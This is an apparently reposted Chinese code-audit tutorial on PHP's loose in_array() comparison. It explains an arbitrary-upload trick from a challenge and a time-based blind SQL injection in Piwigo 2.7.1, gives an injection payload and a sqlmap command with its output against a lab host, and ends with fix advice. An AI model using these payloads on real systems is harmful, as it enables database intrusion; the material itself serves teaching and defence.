2. 程式人生 > >程式碼審計學習01-in_array() 函式缺陷

程式碼審計學習01-in_array() 函式缺陷

阿新 發佈:2018-10-31

一、開始程式碼審計之旅 01

從今天起,學習程式碼審計了,這篇文章就叫程式碼審計01吧,題目來自 PHP SECURITY CALENDAR 2017 的第一題,結合 紅日安全 寫的文章,開始吧。

二、先看這道題目

1、題目名稱:Wish List

1539876151333

2、in_array() 函式的作用

1539877083708

in_array() 函式的作用是判斷第一引數是否存在第二個引數中,存在返回 true,不存在返回 false。需要注意的是,如果函式第三個引數為 true,則第一個引數必須還要和第二個引數同類型,函式才能返回 true。不寫第三個引數,在一些情況下函式會發生強制轉換,題目的漏洞就出在這裡。

3、題目漏洞解析

if (in_array($this->file['name'], $this->whitelist)) {
    move_uploaded_file($this->file['tmp_name'], self::UPLOAD_DIRECTORY . $this->file['name']);
}

in_array() 函式並只簡單判斷檔名是否存在白名單中,並沒有將第三個引數設定為 true,攻擊者可以上傳一個 5backdoor.php 的檔案,其檔名為 5backdoor,in_array() 函式將檔名強制轉換為 5 ,符合 ranger(1,24) 的白名單條件,5backdoor.php

可以上傳,於是一個任意檔案上傳漏洞就產生了。

4、in_array() 的擴充套件知識

in_array 的一段程式碼,可以明確看到非嚴格模式與嚴格模式下的區別:

<?php
$array = array(
    'egg' => true,
    'cheese' => false,
    'hair' => 765,
    'goblins' => null,
    'ogres' => 'no ogres allowed in this array'
);

// Loose checking -- return values are in comments
// First three make sense, last four do not
var_dump(in_array(null, $array)); // true
var_dump(in_array(false, $array)); // true
var_dump(in_array(765, $array)); // true
var_dump(in_array(763, $array)); // true
var_dump(in_array('egg', $array)); // true
var_dump(in_array('hhh', $array)); // true
var_dump(in_array(array(), $array)); // true

// Strict checking
var_dump(in_array(null, $array, true)); // true
var_dump(in_array(false, $array, true)); // true
var_dump(in_array(765, $array, true)); // true
var_dump(in_array(763, $array, true)); // false
var_dump(in_array('egg', $array, true)); // false
var_dump(in_array('hhh', $array, true)); // false
var_dump(in_array(array(), $array, true)); // false

?>

三、結合一個案例

選取 piwigo2.7.1 內容管理系統的一個 SQL 注入漏洞來分析

1、漏洞原理分析

漏洞涉及檔案:include/functions_rate.inc.phpinclude/config_default.inc.php,以及根目錄下的picture.php

picture.php 關鍵程式碼:

if (isset($_GET['action']))
{
  switch ($_GET['action'])
/*****************中間省略*********************/  
     case 'rate' :
    {
      include_once(PHPWG_ROOT_PATH.'include/functions_rate.inc.php');
      rate_picture($page['image_id'], $_POST['rate']);
      redirect($url_self);
    }
/*****************中間省略*********************/    
}

include/functions_rate.inc.php 關鍵程式碼

function rate_picture($image_id, $rate)
{
  global $conf, $user;

  if (!isset($rate)
      or !$conf['rate']
      or !in_array($rate, $conf['rate_items']))
  {
    return false;
  }
/*****************中間省略*********************/   
  if ($user_anonymous)
  {
    $query.= ' AND anonymous_id = \''.$anonymous_id.'\'';
  }
  pwg_query($query);
  $query = '
INSERT
  INTO '.RATE_TABLE.'
  (user_id,anonymous_id,element_id,rate,date)
  VALUES
  ('
    .$user['id'].','
    .'\''.$anonymous_id.'\','
    .$image_id.','
    .$rate
    .',NOW())
;';
  pwg_query($query);

  return update_rating_score($image_id);
}

include/config_default.inc.php 關鍵程式碼

$conf['rate_items'] = array(0,1,2,3,4,5);

通過上述程式碼分析,當引數 action=rate時會呼叫 include/functions_rate.inc.phprate_picture($image_id, $rate) 函式,由於函式中的 in_array($rate, $conf['rate_items'])) 沒有將第三個引數設定因為 true,檢查不嚴格,導致變數 $rate 變數可控,將 $rate 設定為 1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));# 那麼 SQL 語句就會變成:

INSERT INTO piwigo_rate (user_id,anonymous_id,element_id,rate,date) 
VALUES (2,'192.168.2',1,1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));#,NOW()) ;

基於時間的 SQL 盲注就產生了。

2、漏洞證明

用 SQL 注入工具 sqlmap 證明漏洞,payload 如下:

python2 sqlmap.py -u "http://192.168.203.131/piwigo/picture.php?/1/category/1&action=rate" --data "rate=1" --dbs --batch

漏洞驗證返回結果:

[20:45:34] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://192.168.203.131:80/piwigo/picture.php?/1/category/1'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rate (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: rate=1 AND SLEEP(5)
---
[20:45:37] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.12
[20:45:37] [INFO] fetching database names
[20:45:37] [INFO] fetching number of databases
[20:45:37] [INFO] resumed: 5
[20:45:37] [INFO] resumed: information_schema
[20:45:37] [INFO] resumed: mysq
[20:45:37] [INFO] resumed: mysql
[20:45:37] [INFO] resumed: performance_schema
[20:45:37] [INFO] resumed: piwigo271
available databases [5]:
[*] information_schema
[*] mysq
[*] mysql
[*] performance_schema
[*] piwigo271

3、修復建議

方法1:將 in_array() 函式的第三個引數設定為 true;

方法2:使用 intval() 函式將變數將轉為數字;

方法3:使用正則表示式過濾,只限製為數字(官方修改是用這種方法)。

四、學習一道同類型的 CTF 題目

五、個人收穫

六、參考文章

相關推薦

程式碼審計學習01-in_array() 函式缺陷

一、開始程式碼審計之旅 01 從今天起,學習程式碼審計了,這篇文章就叫程式碼審計01吧,題目來自 PHP SECURITY CALENDAR 2017 的第一題,結合 紅日安全 寫的文章,開始吧。 二、先看這道題目 1、題目名稱:Wish List 2、in_array() 函式的作用 in

代碼審計學習01-in_array() 函數缺陷

direct sql 語句 roo lis _id send ret .com www 一、開始代碼審計之旅 01 從今天起,學習代碼審計了,這篇文章就叫代碼審計01吧,題目來自 PHP SECURITY CALENDAR 2017 的第一題,結合 紅日安全 寫的文章,開始

PHP程式碼審計02之filter_var()函式缺陷

#前言 根據紅日安全寫的文章,學習PHP程式碼審計審計的第二節內容,題目均來自**PHP SECURITY CALENDAR 2017**,講完這個題目,會有一道CTF題目來進行鞏固,外加一個例項來深入分析,想了解上一篇的內容,可以點選這裡:[PHP程式碼審計01之in_array()函式缺陷](https:

PHP程式碼審計01in_array()函式缺陷

#前言 從今天起,結合紅日安全寫的文章,開始學習程式碼審計,題目均來自**PHP SECURITY CALENDAR 2017**,講完這個題目,會再用一道有相同問題的CTF題來進行鞏固。下面開始分析。 #漏洞分析 下面我們看第一題,程式碼如下: ``` ``` 這一關考察的是任意檔案上傳漏洞,導致這個漏洞

程式碼審計系列篇一之程式碼審計學習思路

學習程式碼審計要熟悉三種技術,分四部分走一:程式語言  1:前端語言 html/javascript/dom元素使用 主要是為了挖掘xss漏洞 jquery 主要寫一些涉及到CSRF指令碼使用的或者DOM型XSS,JSON劫持等2:後端語言 基礎語法要知道例如 變數型別,常量,陣列(pyt

程式碼審計學習筆記

一、程式碼審計環境搭建 1.1 wamp/wnmp環境搭建 常用的整合環境有phpStudy、WampServer、XAMPP及AppServ。 phpStudy=Apache+Nginx+Lighttpd+PHP+MySQL+phpMyadmin+Zend Opt

PHP程式碼審計學習

原文:http://paper.tuisec.win/detail/1fa2683bd1ca79c 作者:June 這是一次分享準備。自己還沒有總結這個的能力,這次就當個搬運工好了~~ 0x01 工具準備 PHPSTORM,不只是程式設計。 個人覺得只要能夠提供全域性搜尋、單

php陣列學習in_array() 函式查詢陣列中是否存在某個值

   下面給給同學們介紹一下php陣列的內建函式in_array(). bool in_array ( mixed needle, array haystack [, bool strict]) 第一個引數:needle是要查詢的值,值可以是數字也可以是字串,當是字串時候,是區分大小寫。 第二個引數:hays

PHP程式碼審計04之strpos函式使用不當

#前言 根據紅日安全寫的文章,學習PHP程式碼審計的第四節內容,題目均來自**PHP SECURITY CALENDAR 2017**,講完題目會用一個例項來加深鞏固,這是之前寫的,有興趣可以去看看: [PHP程式碼審計01之in_array()函式缺陷](https://www.cnblogs.com/lx

少說話多寫程式碼之Python學習035——建立函式01(如何定義函式

不論哪種面嚮物件語言,基礎是類,而類的主要元素是函式。那麼我們看看在Python中如何定義函式, 先看一個內建函式callable,判斷函式是否可呼叫。 import math a=1 b=math.sqrt result1=callable(a) print(result1) result

少說話多寫程式碼之Python學習038——建立函式04(函式的使用 )二分法查詢

二分法查詢有一個重要前提,就是序列是有序的。在有序的序列中找到一箇中點,然後對比目標元素在中點的哪一側,然後依次這樣查詢,最終找到。邏輯非常簡單。我們主要看在 Python中是如何實現的,直接看程式碼如下, def binarySearch(sequnce,number,lower=0,up

少說話多寫程式碼之Python學習037——建立函式03(函式的使用 )遞迴

前面學會了如何建立函式,至於函式引數列表的使用,函式內部作用域,函式過載等等,Python中的函式與其他語言的函式並無不同,所以這裡不再說明。我們一般學習的第一門程式語言大多是C語言, 學習C語言我們每每學的都是遞迴,二分查詢,氣泡排序以及各種排序等等。那麼我們選一兩樣看看Python中如何實現

少說話多寫程式碼之Python學習036——建立函式02(函式的註釋)

下面我們看看Python中如何給函式增加註釋,以及如何獲取一個函式的基本資訊。 因為Python是解釋執行的語言,增加註釋和檢視函式資訊都需要一些方法實現。 如下,定義了一個將字串生成MD5的函式,並且加了註釋, 然後可以通過__doc__屬性和help函式來獲取函式的資訊。 import

PHP程式碼審計Day學習筆記5-8

文章目錄 Day5 - escapeshellarg與escapeshellcmd使用不當 前言 mail() FILTER_VALIDATE_EMAIL escapeshellcmd() escapes

SWIFT4.0學習01 - 函式的命名、呼叫以及注意事項

swift語法中函式的使用大概分為以下幾種: swift中函式的命名格式 無返回值函式 有引數有返回值的函式 多個返回值的函式 如何定義外部引數名 如何忽略引數名 如何給引數設定預設值 如何定義可變引數 修改外部引數的值,Inout關鍵字的使用 函式的型別 函式

PHP程式碼審計Day學習筆記

Day1 in_array函式缺陷 定義 in_array函式 bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] ) 引數 描述 needle

java學習01-為什麼java程式會有多個主函式

這周剛剛開始學習java語言,我已經遇到了很多讓我這種新手困惑的問題,所以在這裡記錄下來,作為學習的開始。 今天看學習視訊,見到了一個在C/C++中從未見過的、很“怪”的現象:為什麼一個java程式裡會有兩個主函式?譬如下面這個程式: class MainDemo {

PHP程式碼安全【PHP弱口令、加密函式、繞過函式】/CTF程式碼審計

注:結合現在所學,把以前的一些很散的部落格給彙總起來方便利用【刪了黑歷史,哈哈哈】 1、判等型別 1.1、”==”與”===”比較漏洞/switch 如果你認為“==”和"==="最大的區別在於,“==”是判斷數值是否相等,“===”則是判斷數值和型別是否相等,那就錯了,這

支援向量機SVM----學習筆記三(程式碼實踐一高斯核函式

import numpy as np import matplotlib.pyplot as plt from sklearn import datasets from sklearn.preprocessing import StandardScaler from sklearn.svm import SV

PHP程式碼審計-常見危險函式

PHP程式碼執行函式 eval & assert & preg_replace eval 函式 說明: mixed eval ( string $code ) 把字串 code 作為PHP程式碼執行。 注意: 函式